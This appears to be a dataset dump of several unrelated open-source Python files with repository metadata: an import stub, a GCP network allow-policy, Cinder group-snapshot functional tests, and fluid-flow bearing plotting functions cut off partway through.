| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
76d7c3f608d2084a043657a2da73e41bbc18e997
| 136
|
py
|
Python
|
models/remote/login.py
|
anthill-gaming/anthill-admin
|
e3c29a9bd7c04d2c6ce29528578a93395adf59e0
|
[
"MIT"
] | 1
|
2018-11-30T21:56:14.000Z
|
2018-11-30T21:56:14.000Z
|
models/remote/login.py
|
anthill-gaming/anthill-admin
|
e3c29a9bd7c04d2c6ce29528578a93395adf59e0
|
[
"MIT"
] | null | null | null |
models/remote/login.py
|
anthill-gaming/anthill-admin
|
e3c29a9bd7c04d2c6ce29528578a93395adf59e0
|
[
"MIT"
] | null | null | null |
from anthill.platform.remote_models import remote_model_factory
from anthill.platform.auth import RemoteUser
__all__ = ['RemoteUser']
| 22.666667
| 63
| 0.838235
| 17
| 136
| 6.294118
| 0.647059
| 0.205607
| 0.35514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095588
| 136
| 5
| 64
| 27.2
| 0.869919
| 0
| 0
| 0
| 0
| 0
| 0.073529
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
76dced3b1f3c1e96596eb60b486bfc9c7c957be6
| 3,715
|
py
|
Python
|
python/meta_policy_gcp.py
|
SidharthAnand/api
|
99d4b614b1535590a79a4a839fd31dd28a3524c3
|
[
"MIT"
] | 4
|
2021-01-24T01:33:13.000Z
|
2022-03-19T12:57:50.000Z
|
python/meta_policy_gcp.py
|
SidharthAnand/api
|
99d4b614b1535590a79a4a839fd31dd28a3524c3
|
[
"MIT"
] | 4
|
2021-03-16T16:36:12.000Z
|
2021-06-26T16:40:47.000Z
|
python/meta_policy_gcp.py
|
SidharthAnand/api
|
99d4b614b1535590a79a4a839fd31dd28a3524c3
|
[
"MIT"
] | 7
|
2021-01-07T15:53:51.000Z
|
2021-06-21T18:17:00.000Z
|
import api
class MpGCP:
    """Meta-policies accepting known-good GCP traffic (metadata server,
    googleapis endpoints) from recognised client processes.

    Fix: pattern strings containing ``\\.`` are now raw strings. The previous
    non-raw literals relied on Python keeping unrecognised escape sequences
    verbatim, which raises a SyntaxWarning/DeprecationWarning on modern
    Python; the string values are byte-identical.
    """
    # Each entry matches a network-access event (NAE) by client process and
    # server endpoint, and normalises the server dns_pattern in `changes`.
    policies = [
        api.AcceptLink(filters=[
            api.f.type("NAE"),
            api.f.endpoint("process", "dockerd", who="client"),
            api.f.endpoint("dns_pattern", ":storage.googleapis.com:", who="server"),
        ], changes=[
            ("server", "dns_pattern", r".*:storage\.googleapis\.com:.*"),
        ]),
        api.AcceptLink(filters=[
            api.f.type("NAE"),
            api.f.endpoint("process", "/google-cloud-sdk/lib/gcloud.py", who="client"),
            api.f.endpoint("dns_pattern", ":.*.googleapis.com:", who="server"),
        ], changes=[
            ("server", "dns_pattern", r":.*\.googleapis\.com:"),
        ]),
        api.AcceptLink(filters=[
            api.f.type("NAE"),
            api.f.endpoint("process", ["signalfx-agent", "/usr/bin/google_accounts_daemon", "/usr/bin/google_clock_skew_daemon", "/usr/bin/google_network_daemon", "/usr/bin/google_metadata_script_runner"], who="client"),
            # 169.254.169.254:80 is the GCP metadata endpoint address.
            api.f.endpoint("subnet", "169.254.169.254", who="server"),
            api.f.endpoint("netmask", 32, who="server"),
            api.f.endpoint("dst_port", 80, who="server"),
        ], changes=[
        ]),
        api.AcceptLink(filters=[
            api.f.type("NAE"),
            api.f.endpoint("process", "google-cloud-sdk/lib/gcloud.py", who="client"),
            api.f.endpoint("dns_pattern", ":metadata.google.internal:", who="server"),
        ], changes=[
            ("server", "dns_pattern", r":metadata\.google\.internal:"),
        ]),
        api.AcceptLink(filters=[
            api.f.type("NAE"),
            api.f.endpoint("app", ".*.istio-proxy"),
            api.f.endpoint("process", "pilot-agent", who="client"),
            api.f.endpoint("dns_pattern", ":metadata.google.internal:", who="server"),
        ], changes=[
            ("server", "dns_pattern", r":metadata\.google\.internal:"),
        ]),
        api.AcceptLink(filters=[
            api.f.type("NAE"),
            api.f.endpoint("app", "linux"),
            api.f.endpoint("process", "/usr/bin/google_", who="client"),
            api.f.endpoint("dns_pattern", ":metadata.google.internal:", who="server"),
        ], changes=[
            ("server", "dns_pattern", r":metadata\.google\.internal:"),
        ]),
        api.AcceptLink(filters=[
            api.f.type("NAE"),
            api.f.endpoint("binary_name", "kubernetes/bin/node-problem-detector", who="client"),
            api.f.endpoint("dns_pattern", ":.*.googleapis.com:", who="server"),
        ], changes=[
            ("server", "dns_pattern", r":.*\.googleapis\.com:"),
        ]),
        api.AcceptLink(filters=[
            api.f.type("NAE"),
            api.f.endpoint("app", r"kube-system\."),
            api.f.endpoint("process", "external-dns", who="client"),
            api.f.endpoint("dns_pattern", ":.*.googleapis.com:", who="server"),
        ], changes=[
            ("server", "dns_pattern", r":.*\.googleapis\.com:"),
        ]),
        api.AcceptLink(filters=[
            api.f.type("NAE"),
            api.f.endpoint("app", "kube-system.*.external-dns"),
            api.f.endpoint("process", "external-dns", who="client"),
            api.f.endpoint("dns_pattern", ":metadata.google.internal:", who="server"),
        ], changes=[
            ("server", "dns_pattern", r":metadata\.google\.internal:"),
        ]),
    ]
# Register the GCP meta-policy class with the global meta-policy runner
# as a side effect of importing this module.
print("Adding meta-policies to runner")
api.mpr.add(MpGCP)
| 48.246753
| 224
| 0.492328
| 365
| 3,715
| 4.931507
| 0.189041
| 0.073333
| 0.16
| 0.115
| 0.787778
| 0.745
| 0.745
| 0.727778
| 0.702778
| 0.702778
| 0
| 0.006233
| 0.309018
| 3,715
| 76
| 225
| 48.881579
| 0.694975
| 0
| 0
| 0.702703
| 0
| 0
| 0.340511
| 0.158277
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013514
| 0
| 0.040541
| 0.013514
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
76e98f68c33e7c073dab79f010c102d8ef3dcde1
| 15,214
|
py
|
Python
|
cinder/tests/functional/test_group_snapshots.py
|
ilay09/cinder
|
86f084d42f18bd5971cc7a0df3e6d815543a472d
|
[
"Apache-2.0"
] | null | null | null |
cinder/tests/functional/test_group_snapshots.py
|
ilay09/cinder
|
86f084d42f18bd5971cc7a0df3e6d815543a472d
|
[
"Apache-2.0"
] | null | null | null |
cinder/tests/functional/test_group_snapshots.py
|
ilay09/cinder
|
86f084d42f18bd5971cc7a0df3e6d815543a472d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 EMC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder.tests.functional import functional_helpers
class GroupSnapshotsTest(functional_helpers._FunctionalTestBase):
_vol_type_name = 'functional_test_type'
_grp_type_name = 'functional_grp_test_type'
osapi_version_major = '3'
osapi_version_minor = '19'
def setUp(self):
super(GroupSnapshotsTest, self).setUp()
self.volume_type = self.api.create_type(self._vol_type_name)
self.group_type = self.api.create_group_type(self._grp_type_name)
def _get_flags(self):
f = super(GroupSnapshotsTest, self)._get_flags()
f['volume_driver'] = (
'cinder.tests.fake_driver.FakeLoggingVolumeDriver')
f['default_volume_type'] = self._vol_type_name
f['default_group_type'] = self._grp_type_name
return f
def test_get_group_snapshots_summary(self):
"""Simple check that listing group snapshots works."""
grp_snaps = self.api.get_group_snapshots(False)
self.assertIsNotNone(grp_snaps)
def test_get_group_snapshots(self):
"""Simple check that listing group snapshots works."""
grp_snaps = self.api.get_group_snapshots()
self.assertIsNotNone(grp_snaps)
def test_create_and_delete_group_snapshot(self):
"""Creates and deletes a group snapshot."""
# Create group
created_group = self.api.post_group(
{'group': {'group_type': self.group_type['id'],
'volume_types': [self.volume_type['id']]}})
self.assertTrue(created_group['id'])
created_group_id = created_group['id']
# Check it's there
found_group = self._poll_group_while(created_group_id,
['creating'])
self.assertEqual(created_group_id, found_group['id'])
self.assertEqual(self.group_type['id'], found_group['group_type'])
self.assertEqual('available', found_group['status'])
# Create volume
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'group_id': created_group_id,
'volume_type': self.volume_type['id']}})
self.assertTrue(created_volume['id'])
created_volume_id = created_volume['id']
# Check it's there
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(self._vol_type_name, found_volume['volume_type'])
self.assertEqual(created_group_id, found_volume['group_id'])
# Wait (briefly) for creation. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['creating'])
# It should be available...
self.assertEqual('available', found_volume['status'])
# Create group snapshot
created_group_snapshot = self.api.post_group_snapshot(
{'group_snapshot': {'group_id': created_group_id}})
self.assertTrue(created_group_snapshot['id'])
created_group_snapshot_id = created_group_snapshot['id']
# Check it's there
found_group_snapshot = self._poll_group_snapshot_while(
created_group_snapshot_id, ['creating'])
self.assertEqual(created_group_snapshot_id, found_group_snapshot['id'])
self.assertEqual(created_group_id,
found_group_snapshot['group_id'])
self.assertEqual('available', found_group_snapshot['status'])
# Delete the group snapshot
self.api.delete_group_snapshot(created_group_snapshot_id)
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_group_snapshot = self._poll_group_snapshot_while(
created_group_snapshot_id, ['deleting'])
# Delete the original group
self.api.delete_group(created_group_id,
{'delete': {'delete-volumes': True}})
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
found_group = self._poll_group_while(created_group_id, ['deleting'])
# Should be gone
self.assertFalse(found_group_snapshot)
self.assertFalse(found_volume)
self.assertFalse(found_group)
def test_create_group_from_group_snapshot(self):
"""Creates a group from a group snapshot."""
# Create group
created_group = self.api.post_group(
{'group': {'group_type': self.group_type['id'],
'volume_types': [self.volume_type['id']]}})
self.assertTrue(created_group['id'])
created_group_id = created_group['id']
# Check it's there
found_group = self._poll_group_while(created_group_id,
['creating'])
self.assertEqual(created_group_id, found_group['id'])
self.assertEqual(self.group_type['id'], found_group['group_type'])
self.assertEqual('available', found_group['status'])
# Create volume
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'group_id': created_group_id,
'volume_type': self.volume_type['id']}})
self.assertTrue(created_volume['id'])
created_volume_id = created_volume['id']
# Check it's there
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(self._vol_type_name, found_volume['volume_type'])
self.assertEqual(created_group_id, found_volume['group_id'])
# Wait (briefly) for creation. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['creating'])
# It should be available...
self.assertEqual('available', found_volume['status'])
# Create group snapshot
created_group_snapshot = self.api.post_group_snapshot(
{'group_snapshot': {'group_id': created_group_id}})
self.assertTrue(created_group_snapshot['id'])
created_group_snapshot_id = created_group_snapshot['id']
# Check it's there
found_group_snapshot = self._poll_group_snapshot_while(
created_group_snapshot_id, ['creating'])
self.assertEqual(created_group_snapshot_id, found_group_snapshot['id'])
self.assertEqual(created_group_id,
found_group_snapshot['group_id'])
self.assertEqual('available', found_group_snapshot['status'])
# Create group from group snapshot
created_group_from_snap = self.api.post_group_from_src(
{'create-from-src': {
'group_snapshot_id': created_group_snapshot_id}})
self.assertTrue(created_group_from_snap['id'])
created_group_from_snap_id = created_group_from_snap['id']
# Check it's there
found_volumes = self.api.get_volumes()
self._poll_volume_while(found_volumes[0], ['creating'])
self._poll_volume_while(found_volumes[1], ['creating'])
found_group_from_snap = self._poll_group_while(
created_group_from_snap_id, ['creating'])
self.assertEqual(created_group_from_snap_id,
found_group_from_snap['id'])
self.assertEqual(created_group_snapshot_id,
found_group_from_snap['group_snapshot_id'])
self.assertEqual(self.group_type['id'],
found_group_from_snap['group_type'])
self.assertEqual('available', found_group_from_snap['status'])
# Delete the group from snap
self.api.delete_group(created_group_from_snap_id,
{'delete': {'delete-volumes': True}})
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_group_from_snap = self._poll_group_while(
created_group_from_snap_id, ['deleting'])
# Delete the group snapshot
self.api.delete_group_snapshot(created_group_snapshot_id)
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_group_snapshot = self._poll_group_snapshot_while(
created_group_snapshot_id, ['deleting'])
# Delete the original group
self.api.delete_group(created_group_id,
{'delete': {'delete-volumes': True}})
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
found_group = self._poll_group_while(created_group_id, ['deleting'])
# Should be gone
self.assertFalse(found_group_from_snap)
self.assertFalse(found_group_snapshot)
self.assertFalse(found_volume)
self.assertFalse(found_group)
def test_create_group_from_source_group(self):
"""Creates a group from a source group."""
# Create group
created_group = self.api.post_group(
{'group': {'group_type': self.group_type['id'],
'volume_types': [self.volume_type['id']]}})
self.assertTrue(created_group['id'])
created_group_id = created_group['id']
# Check it's there
found_group = self._poll_group_while(created_group_id,
['creating'])
self.assertEqual(created_group_id, found_group['id'])
self.assertEqual(self.group_type['id'], found_group['group_type'])
self.assertEqual('available', found_group['status'])
# Create volume
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'group_id': created_group_id,
'volume_type': self.volume_type['id']}})
self.assertTrue(created_volume['id'])
created_volume_id = created_volume['id']
# Check it's there
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(self._vol_type_name, found_volume['volume_type'])
self.assertEqual(created_group_id, found_volume['group_id'])
# Wait (briefly) for creation. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['creating'])
# It should be available...
self.assertEqual('available', found_volume['status'])
# Test create group from source group
created_group_from_group = self.api.post_group_from_src(
{'create-from-src': {
'source_group_id': created_group_id}})
self.assertTrue(created_group_from_group['id'])
created_group_from_group_id = created_group_from_group['id']
# Check it's there
found_volumes = self.api.get_volumes()
self._poll_volume_while(found_volumes[0], ['creating'])
self._poll_volume_while(found_volumes[1], ['creating'])
found_group_from_group = self._poll_group_while(
created_group_from_group_id, ['creating'])
self.assertEqual(created_group_from_group_id,
found_group_from_group['id'])
self.assertEqual(created_group_id,
found_group_from_group['source_group_id'])
self.assertEqual(self.group_type['id'],
found_group_from_group['group_type'])
self.assertEqual('available', found_group_from_group['status'])
# Delete the group from group
self.api.delete_group(created_group_from_group_id,
{'delete': {'delete-volumes': True}})
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_group_from_group = self._poll_group_while(
created_group_from_group_id, ['deleting'])
# Delete the original group
self.api.delete_group(created_group_id,
{'delete': {'delete-volumes': True}})
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
found_group = self._poll_group_while(created_group_id, ['deleting'])
# Should be gone
self.assertFalse(found_group_from_group)
self.assertFalse(found_volume)
self.assertFalse(found_group)
def test_reset_group_snapshot(self):
# Create group
group1 = self.api.post_group(
{'group': {'group_type': self.group_type['id'],
'volume_types': [self.volume_type['id']]}})
self.assertTrue(group1['id'])
group_id = group1['id']
self._poll_group_while(group_id, ['creating'])
# Create volume
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'group_id': group_id,
'volume_type': self.volume_type['id']}})
self.assertTrue(created_volume['id'])
created_volume_id = created_volume['id']
self._poll_volume_while(created_volume_id, ['creating'])
# Create group snapshot
group_snapshot1 = self.api.post_group_snapshot(
{'group_snapshot': {'group_id': group_id}})
self.assertTrue(group_snapshot1['id'])
group_snapshot_id = group_snapshot1['id']
self._poll_group_snapshot_while(group_snapshot_id, 'creating')
group_snapshot1 = self.api.get_group_snapshot(group_snapshot_id)
self.assertEqual("available", group_snapshot1['status'])
# reset group snapshot status
self.api.reset_group_snapshot(group_snapshot_id,
{"reset_status": {"status": "error"}})
group_snapshot1 = self.api.get_group_snapshot(group_snapshot_id)
self.assertEqual("error", group_snapshot1['status'])
# Delete group, volume and group snapshot
self.api.delete_group_snapshot(group_snapshot_id)
found_group_snapshot = self._poll_group_snapshot_while(
group_snapshot_id, ['deleting'])
self.api.delete_group(group_id,
{'delete': {'delete-volumes': True}})
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
found_group = self._poll_group_while(group_id, ['deleting'])
# Created resources should be gone
self.assertFalse(found_group_snapshot)
self.assertFalse(found_volume)
self.assertFalse(found_group)
| 43.593123
| 79
| 0.645524
| 1,804
| 15,214
| 5.08204
| 0.086475
| 0.102094
| 0.050393
| 0.038394
| 0.850894
| 0.820244
| 0.782832
| 0.758072
| 0.722186
| 0.705716
| 0
| 0.002542
| 0.250033
| 15,214
| 348
| 80
| 43.718391
| 0.800964
| 0.150256
| 0
| 0.672811
| 0
| 0
| 0.10257
| 0.005607
| 0
| 0
| 0
| 0
| 0.299539
| 1
| 0.036866
| false
| 0
| 0.004608
| 0
| 0.069124
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
76fe0d6b3d5fa70da953e254c70cafcb0e9d737d
| 16,551
|
py
|
Python
|
ross/fluid_flow/fluid_flow_graphics.py
|
flaviorangel/test-joss-paper
|
480eae9c685ed3d96e9c5971d0b9ea1356eaf7d9
|
[
"MIT"
] | null | null | null |
ross/fluid_flow/fluid_flow_graphics.py
|
flaviorangel/test-joss-paper
|
480eae9c685ed3d96e9c5971d0b9ea1356eaf7d9
|
[
"MIT"
] | null | null | null |
ross/fluid_flow/fluid_flow_graphics.py
|
flaviorangel/test-joss-paper
|
480eae9c685ed3d96e9c5971d0b9ea1356eaf7d9
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
from bokeh.plotting import figure
import numpy as np
def plot_eccentricity(fluid_flow_object, z=0):
    """Plot the rotor/stator cross-section at a given z plane.

    The stator boundary points are drawn in red and the rotor boundary
    points in blue; the rotor center and origin are marked as well.

    Parameters
    ----------
    fluid_flow_object: a FluidFlow object
    z: int, optional
        The distance in z where to cut and plot.

    Returns
    -------
    Figure
        An object containing the plot.

    Examples
    --------
    >>> from ross.fluid_flow.fluid_flow import fluid_flow_example
    >>> my_fluid_flow = fluid_flow_example()
    >>> fig = plot_eccentricity(my_fluid_flow, z=int(my_fluid_flow.nz/2))
    >>> # to show the plots you can use:
    >>> # show(fig)
    """
    bearing = fluid_flow_object
    fig = figure(
        title="Cut in plane Z=" + str(z),
        x_axis_label="X axis",
        y_axis_label="Y axis",
    )
    # One red (outer/stator) and one blue (inner/rotor) dot per theta step.
    for j in range(bearing.ntheta):
        fig.circle(bearing.xre[z][j], bearing.yre[z][j], color="red")
        fig.circle(bearing.xri[z][j], bearing.yri[z][j], color="blue")
    fig.circle(0, 0, color="blue")
    fig.circle(bearing.xi, bearing.yi, color="red")
    fig.circle(0, 0, color="black")
    return fig
def plot_pressure_z(fluid_flow_object, theta=0):
    """Plot the pressure along the z-axis at a fixed theta.

    Draws the numerically calculated pressure in blue and/or the
    analytically calculated pressure in red, whichever is available.

    Parameters
    ----------
    fluid_flow_object: a FluidFlow object
    theta: int, optional
        The theta to be considered.

    Returns
    -------
    Figure
        An object containing the plot.

    Raises
    ------
    ValueError
        If neither pressure matrix has been calculated yet.

    Examples
    --------
    >>> from ross.fluid_flow.fluid_flow import fluid_flow_example
    >>> my_fluid_flow = fluid_flow_example()
    >>> my_fluid_flow.calculate_pressure_matrix_numerical() # doctest: +ELLIPSIS
    array([[...
    >>> fig = plot_pressure_z(my_fluid_flow, theta=int(my_fluid_flow.ntheta/2))
    >>> # to show the plots you can use:
    >>> # show(fig)
    """
    if (
        not fluid_flow_object.numerical_pressure_matrix_available
        and not fluid_flow_object.analytical_pressure_matrix_available
    ):
        raise ValueError(
            "Must calculate the pressure matrix. "
            "Try calling calculate_pressure_matrix_numerical() or calculate_pressure_matrix_analytical() first."
        )
    # Column `theta` of each pressure matrix, taken along the z direction.
    planes = range(fluid_flow_object.nz)
    y_numerical = [fluid_flow_object.p_mat_numerical[i][theta] for i in planes]
    y_analytical = [fluid_flow_object.p_mat_analytical[i][theta] for i in planes]
    graph = figure(
        title="Pressure along the Z direction (direction of flow); Theta="
        + str(theta),
        x_axis_label="Points along Z",
    )
    if fluid_flow_object.numerical_pressure_matrix_available:
        graph.line(fluid_flow_object.z_list, y_numerical, legend="Numerical pressure", color="blue", line_width=2)
    if fluid_flow_object.analytical_pressure_matrix_available:
        graph.line(fluid_flow_object.z_list, y_analytical, legend="Analytical pressure", color="red", line_width=2)
    return graph
def plot_shape(fluid_flow_object, theta=0):
    """Plot the rotor and stator radii along z at a fixed theta.

    The stator (outer) radius is drawn in red, the rotor (inner) radius
    in blue.

    Parameters
    ----------
    fluid_flow_object: a FluidFlow object
    theta: int, optional
        The theta to be considered.

    Returns
    -------
    Figure
        An object containing the plot.

    Examples
    --------
    >>> from ross.fluid_flow.fluid_flow import fluid_flow_example
    >>> my_fluid_flow = fluid_flow_example()
    >>> fig = plot_shape(my_fluid_flow, theta=int(my_fluid_flow.ntheta/2))
    >>> # to show the plots you can use:
    >>> # show(fig)
    """
    planes = range(fluid_flow_object.nz)
    outer_radius = np.array([fluid_flow_object.re[i][theta] for i in planes])
    inner_radius = np.array([fluid_flow_object.ri[i][theta] for i in planes])
    graph = figure(
        title="Shapes of stator and rotor along Z; Theta=" + str(theta),
        x_axis_label="Points along Z",
        y_axis_label="Radial direction",
    )
    graph.line(fluid_flow_object.z_list, outer_radius, line_width=2, color="red")
    graph.line(fluid_flow_object.z_list, inner_radius, line_width=2, color="blue")
    return graph
def plot_pressure_theta(fluid_flow_object, z=0):
    """This function assembles pressure graphic in the theta direction for a given z
    for one or both the numerically (blue) and analytically (red) calculated pressure matrices,
    depending on if one or both were calculated.

    Parameters
    ----------
    fluid_flow_object: a FluidFlow object
    z: int, optional
        The distance along z-axis to be considered.

    Returns
    -------
    Figure
        An object containing the plot.

    Raises
    ------
    ValueError
        If neither pressure matrix has been calculated yet.

    Examples
    --------
    >>> from ross.fluid_flow.fluid_flow import fluid_flow_example
    >>> my_fluid_flow = fluid_flow_example()
    >>> my_fluid_flow.calculate_pressure_matrix_numerical() # doctest: +ELLIPSIS
    array([[...
    >>> fig = plot_pressure_theta(my_fluid_flow, z=int(my_fluid_flow.nz/2))
    >>> # to show the plots you can use:
    >>> # show(fig)
    """
    if (
        not fluid_flow_object.numerical_pressure_matrix_available
        and not fluid_flow_object.analytical_pressure_matrix_available
    ):
        raise ValueError(
            "Must calculate the pressure matrix. "
            "Try calling calculate_pressure_matrix_numerical() or calculate_pressure_matrix_analytical() first."
        )
    p = figure(
        title="Pressure along Theta; Z=" + str(z),
        x_axis_label="Points along Theta",
        y_axis_label="Pressure",
    )
    # Two independent `if`s (not if/elif): when both matrices are available
    # both curves must be drawn, matching the docstring and the sibling
    # plot_pressure_z / matplot_pressure_theta functions.
    if fluid_flow_object.numerical_pressure_matrix_available:
        p.line(
            fluid_flow_object.gama[z],
            fluid_flow_object.p_mat_numerical[z],
            legend="Numerical pressure",
            line_width=2,
            color="blue",
        )
    if fluid_flow_object.analytical_pressure_matrix_available:
        p.line(
            fluid_flow_object.gama[z],
            fluid_flow_object.p_mat_analytical[z],
            legend="Analytical pressure",
            line_width=2,
            color="red",
        )
    return p
def matplot_eccentricity(fluid_flow_object, z=0, ax=None):
    """This function assembles pressure graphic along the z-axis using matplotlib.
    The first few plots are of a different color to indicate where theta begins.

    Parameters
    ----------
    fluid_flow_object: a FluidFlow object
    z: int, optional
        The distance in z where to cut and plot.
    ax : matplotlib axes, optional
        Axes in which the plot will be drawn.

    Returns
    -------
    ax : matplotlib axes
        Returns the axes object with the plot.

    Examples
    --------
    >>> from ross.fluid_flow.fluid_flow import fluid_flow_example
    >>> my_fluid_flow = fluid_flow_example()
    >>> fig, ax = plt.subplots()
    >>> ax = matplot_eccentricity(my_fluid_flow, z=int(my_fluid_flow.nz/2), ax=ax)
    >>> # to show the plots you can use:
    >>> # plt.show()
    """
    if ax is None:
        ax = plt.gca()
    # Outer boundary (red) and inner boundary (blue) points at plane z.
    thetas = range(fluid_flow_object.ntheta)
    x_r = [fluid_flow_object.xre[z][j] for j in thetas]
    y_r = [fluid_flow_object.yre[z][j] for j in thetas]
    x_b = [fluid_flow_object.xri[z][j] for j in thetas]
    y_b = [fluid_flow_object.yri[z][j] for j in thetas]
    ax.plot(x_r, y_r, "r.")
    ax.plot(x_b, y_b, "b.")
    ax.plot(0, 0, "r*")
    ax.plot(fluid_flow_object.xi, fluid_flow_object.yi, "b*")
    ax.set_title("Cut in plane Z=" + str(z))
    ax.set_xlabel("X axis")
    ax.set_ylabel("Y axis")
    # Apply the equal aspect to *this* axes: plt.axis("equal") would act on
    # the *current* axes, which may differ from a caller-supplied `ax`.
    ax.axis("equal")
    return ax
def matplot_pressure_z(fluid_flow_object, theta=0, ax=None):
    """Plot the pressure along the z-axis at a fixed theta using matplotlib.

    Draws the numerically calculated pressure in blue and/or the
    analytically calculated pressure in red, whichever is available.

    Parameters
    ----------
    fluid_flow_object: a FluidFlow object
    theta: int, optional
        The distance in theta where to cut and plot.
    ax : matplotlib axes, optional
        Axes in which the plot will be drawn.

    Returns
    -------
    ax : matplotlib axes
        Returns the axes object with the plot.

    Raises
    ------
    ValueError
        If neither pressure matrix has been calculated yet.

    Examples
    --------
    >>> from ross.fluid_flow.fluid_flow import fluid_flow_example
    >>> my_fluid_flow = fluid_flow_example()
    >>> my_fluid_flow.calculate_pressure_matrix_numerical() # doctest: +ELLIPSIS
    array([[...
    >>> ax = matplot_pressure_z(my_fluid_flow, theta=int(my_fluid_flow.ntheta/2))
    >>> # to show the plots you can use:
    >>> # plt.show()
    """
    if (
        not fluid_flow_object.numerical_pressure_matrix_available
        and not fluid_flow_object.analytical_pressure_matrix_available
    ):
        raise ValueError(
            "Must calculate the pressure matrix. "
            "Try calling calculate_pressure_matrix_numerical() or calculate_pressure_matrix_analytical() first."
        )
    if ax is None:
        ax = plt.gca()
    # Column `theta` of each pressure matrix, sampled along z.
    planes = range(fluid_flow_object.nz)
    y_numerical = np.array(
        [fluid_flow_object.p_mat_numerical[i][theta] for i in planes]
    )
    y_analytical = np.array(
        [fluid_flow_object.p_mat_analytical[i][theta] for i in planes]
    )
    if fluid_flow_object.numerical_pressure_matrix_available:
        ax.plot(fluid_flow_object.z_list, y_numerical, "b", label="Numerical pressure")
    if fluid_flow_object.analytical_pressure_matrix_available:
        ax.plot(fluid_flow_object.z_list, y_analytical, "r", label="Analytical pressure")
    ax.set_title(
        "Pressure along the Z direction (direction of flow); Theta=" + str(theta)
    )
    ax.set_xlabel("Points along Z")
    ax.set_ylabel("Pressure")
    return ax
def matplot_shape(fluid_flow_object, theta=0, ax=None):
    """Plot the rotor and stator radii along z at a fixed theta using matplotlib.

    The stator (outer) radius is drawn in red, the rotor (inner) radius
    in blue.

    Parameters
    ----------
    fluid_flow_object: a FluidFlow object
    theta: int, optional
        The theta to be considered.
    ax : matplotlib axes, optional
        Axes in which the plot will be drawn.

    Returns
    -------
    ax : matplotlib axes
        Returns the axes object with the plot.

    Examples
    --------
    >>> from ross.fluid_flow.fluid_flow import fluid_flow_example
    >>> my_fluid_flow = fluid_flow_example()
    >>> ax = matplot_shape(my_fluid_flow, theta=int(my_fluid_flow.ntheta/2))
    >>> # to show the plots you can use:
    >>> # plt.show()
    """
    if ax is None:
        ax = plt.gca()
    planes = range(fluid_flow_object.nz)
    outer_radius = np.array([fluid_flow_object.re[i][theta] for i in planes])
    inner_radius = np.array([fluid_flow_object.ri[i][theta] for i in planes])
    ax.plot(fluid_flow_object.z_list, outer_radius, "r")
    ax.plot(fluid_flow_object.z_list, inner_radius, "b")
    ax.set_title("Shapes of stator and rotor along Z; Theta=" + str(theta))
    ax.set_xlabel("Points along Z")
    ax.set_ylabel("Radial direction")
    return ax
def matplot_pressure_theta_cylindrical(fluid_flow_object, z=0, from_numerical=True, ax=None):
    """This function assembles cylindrical pressure graphic in the theta direction for a given z,
    using matplotlib.

    Parameters
    ----------
    fluid_flow_object: a FluidFlow object
    z: int, optional
        The distance along z-axis to be considered.
    from_numerical: bool, optional
        If True, takes the numerically calculated pressure matrix as entry.
        If False, takes the analytically calculated one instead.
        If condition cannot be satisfied (matrix not calculated), it will take the one that is available
        and raise a warning.
    ax : matplotlib axes, optional
        Axes in which the plot will be drawn.

    Returns
    -------
    ax : matplotlib axes
        Returns the axes object with the plot.

    Examples
    --------
    >>> from ross.fluid_flow.fluid_flow import fluid_flow_example
